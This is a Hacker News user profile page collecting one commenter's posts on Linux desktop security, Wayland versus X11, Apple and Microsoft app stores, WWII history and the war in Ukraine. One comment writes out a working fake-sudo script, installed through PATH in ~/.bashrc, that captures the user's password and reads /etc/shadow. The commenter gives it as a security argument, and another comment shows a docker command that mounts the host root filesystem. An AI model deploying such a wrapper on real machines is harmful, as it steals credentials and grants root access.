HN user

sergeykish

1,115 karma

http://sergeykish.com

Posts3
Comments895
View on HN

Culture that gave world "microagression", "harasment", cancel culture and now numeric "hate". "Not toxic".

Nobody wants to be treated how Torvalds treated people.

Exactly, nobody wants but so many can't stop until treated.

Stop this "we can break stuff" crap. Who maintains udev? Regressions are not acceptable. I'm not going to change the kernel because udev broke, f*ck it. Seriously. More projects need to realize that regressions are totally and utterly unacceptable. ... That just encourages those package maintainers to be shit maintainers. ... And stop blaming the kernel for user space breakage!...

Hate 0.832673044602

For common sense.

Entity asks question, unable to comprehend answer, claim any gaming leads to Valve revenue, discards video editing and art examples. Please stop wasting bytes.

We have entire handheld lines for console emulators. More performant GPUs useful for Dolphin, PPSSPP, RPCS3, Ryujinx. GPU used for 3D modelling and sculpting, video editing, encoding. Steam machine subsidized by $200 PC would be used for anything but Steam, payed by Steam users.

You've ignored "art, video editing" and you claim that your point ignored? Why do you type words at all if issue is their consumption?

If Valve subsidizes PC by $200 why would people not buy for office, art, video editing? And gaming is not only Steam, there is also GOG, EGS, Microsoft Store.

Nausea is from Latin "seasickness", known for thousands years.

From my experience bus was the worst as you can't get front seat, even worse were backward positioned seats. Train and plane were great. Car in the middle, depend on road and driving style.

If I was on bus during childhood you would know by stops it made. We avoided that by traveling by car.

Apple transformed handheld computing into walled garden, brainwashed installation into "sideloading". Apple software update made Apple laptops to fail booting Linux.

"Concerned people are insane anti-Apple without any solid arguments, lol"

Run in docker container:

    $ docker run -it -v.:/app -w /app node:alpine /bin/sh
    /app # docker run --rm -it -v '/:/mnt' -u 'root' 'alpine' '/bin/sh' '-l'
    /bin/sh: docker: not found
I've described attack from host user and isolating attacker with docker.

Web pages handled by browsers. Linux desktop running code without sandbox is reckless, relied on verification by distro maintainers, does not work the moment users run proprietary software.

Programming language packages issue only because we don't have zero trust for modules — no restrictions to open socket or file system. Issue is not count, pure function leftPad can't hurt you.

Linux distributions do not need Copy Fail to get root access:

    echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc

    mkdir -p .local/bin/
    cat <<EOF >.local/bin/sudo
    read -rs -p "[sudo] password for $USER: " PASSWORD
    echo ""
    echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
    EOF

    chmod +x .local/bin/sudo
attack on next sudo call, shows data accessible only to root.

Our security model based on distributions verifying packages, that is distro maintainers. Software we can't trust should be running in VMs. Attack on trivy is just the beginning and solution is removing pip, uv, npm, rbenv from host, running in docker containers:

    $ docker run -it -v.:/app -w /app node:alpine /bin/sh
long term environments defined in docker compose:
    $ docker-compose.yml
    services:
      app:
        image: node:alpine
        volumes:
          - .:/app
        working_dir: /app
        command: /bin/sh
    $ docker compose run app
switch to Kata etc if more protection needed. Eventually all userspace would run in VMs.

API is contract. API grants access to screen content, key presses. Users blame Wayland for breaking this contract. Both Wayland and XLibre namespaces brake it. Lunduke mob unable to reason, claims "moving goalposts". Lunduke mob claims improving security is not needed. Lunduke mod wants Linux desktop to be malware can. They claim security improvements for everyone (like defaults on Android) is corporations taking away their freedom. Lunduke mob unable to comprehend Wayland started by XOrg developers who knew X11 flaws. They unable to be thankful for people bringing security to modern expectations.

Once you enable XLibre namespaces filtering it breaks screensharing, global hotkeys. Obviously. It is breaking change.

Doesn't own a mob, and never happened. Horrible accusation, by the way.

Mob unable to response on technical question. To use logic.

Citation needed.

His YouTube comment section speaks volumes. He manipulates technically uneducated.

Xephyr or Xnest sandbox break screensharing, global shortkeys.

You've just confirmed obvious. No way to improve security without breaking changes. And you demand mostly nontechnical users to blacklist applications. That's a recipe for disaster.

Name how it's possible to improve security on X11 without breakig changes.

Lunduke made factually wrong claims for hype. His mob are keen to attack Open Source developers.

When people believe "they are product", bully Open Source developers for not following their demands and got expected response than entities appear that validate their wrongs for views (money).

Lunduke spreads misinformation. That's anti Open Source, anti community.

"Poland provoked occupation by Germany" (1939)? Germany "liberated Czechoslovakia Germans" by occupation and annexation (1938)? How occupation and annexation of neighbors ended for WW2 Germany (1938-1945)?

In 2014 Moscow invaded Ukraine, occupied Crimea, Donetsk, Luhanks. In 2022 Moscow invaded again. No NATO forces in Ukraine. No Moscow forces on NATO members territory. Trump officials unable to answer who started war, you blame NATO, both you and Trump aligned with Moscow.

Windows RT "sideloading" denied for ordinary users, costly for Line-of-Business apps (2012).

Microsoft UWP only Microsoft Store. Microsoft backtracked their walled garden Windows plans for a while as result of Windows Phone fiasco.

Yes, we are.

How I Use Kagi 1 year ago

Molotov-Ribbentrop Pact — Moscow divided Poland with Germany (1939), invaded Finland (1939), occupied Baltic States (1940) — for two years of WW2 Moscow was Germany ally. After WW2 Moscow occupied half of Europe for 45 years, countries become free less than 50 years ago. Moscow made North Korea and China regimes, still supports dictatorship across the world, occupies and annexes neighbors.

How I Use Kagi 1 year ago

Do you support Oct 7? Do you claim Israel actions are not retaliation? Do you blame Ukraine on fighting occupants?

How I Use Kagi 1 year ago

Majority of Russian Federation population support occupation of Ukraine - independent polls at the start of open invasion. They would stop only when faced consequences.

English is my third language, first two use phonetic alphabet. Blaming bad spelling on ITA is like German, Spanish speakers blaming own languages.

English spelling is a facade. Real English can be seen when sentences written in IPA. Having visual confirmation of sound feels refreshing.

ITA "lief ov a fisherman" is neither phonetic nor English. It replaced broken system with another broken system.

Molotov-Ribbentrop pact — Moscow invaded Finland (1939), occupied Baltic states (1939), divided Poland with Germany (1939). Moscow was Germany ally for two years of WW2. Holodomor (1932-1933): Moscow killed millions without active war. "Great Britain, USA should not have been Moscow ally"?

Moscow invaded Finland in 1939.

Siege of Leningrad was in 1941.

"Poland provoked occupation by Germany" (1939)?

In 1939 Moscow invaded Finland, killed 25,000 its citizens, annexed 10% of territory. Do you claim Finland should have been Moscow ally afterwards?

Android is more secure, yet Android built on Linux kernel, this invalidates Linux kernel security claims. X11? Use Wayland.

UWP requires Microsoft Store or "sideloading" so not used by a lot of applications. Windows is not open source, there could be countless vulnerabilities and backdoors. Windows users still download installers from Web, they are phishing targets.

Linux desktop is mostly open source software. Raise of closed source software would bring Android like security.